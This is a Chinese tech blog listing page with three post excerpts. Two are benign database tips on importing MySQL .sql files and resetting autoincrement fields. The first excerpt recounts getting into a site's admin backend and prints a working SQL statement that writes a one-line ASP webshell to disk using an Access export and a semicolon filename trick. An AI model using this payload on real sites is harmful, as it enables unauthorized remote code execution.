小健博客网络技术综合大全

利用后台的SQL执行命令功能导出WebShell

   今天进了一个网站的后台,发现没有任何可利用的地方,只有一个SQL高级助手,而且有一个站点物理路径,而且这套程序网上是开源的,我知道数据库的表名,于是想到了利用Access导出WebShell,方法如下:

SELECT '<%execute request("z")%>' into [a] in 'c:\z.asp;z.xls' 'excel 8.0;' from a

...

MYSQL 导入SQL数据的三种方法!

      如果我们下载了新的PHP+MYSQL 数据库的程序,有的直接安装数据库,比如像DEDECMS,只需要提供服务器IP,数据库名,用户名,密码这四样东西就行了。

但有的情况是,程序不自带安装程序,只有 .sql 数据库文件,又或者是要搬程序到别的服务器上面,那怎么搬呢。本文就教你如何搬到别的服务器的方法也就是怎样导入 .sql 数据库文件的方法。

...

SQL或ACCESS数据库,自动增量字段重新从1开始的方法

对于一些自动编号(自动增量)的字段,当删除数据后,新增加的数字总是紧接着,而不是连续的。
全部清空后,也不会从1开始。
你可以使用下面的方法。

ACCESS的解决办法是:
清空表的所有数据后,找到 “压缩和修复数据库” 这个。修复一下数据库 就行了。

SQL2000的解决办法是:
在查询分析器里面
TRUNCATE TABLE 表名 即可解决。
...

分页:[«]1[»]
up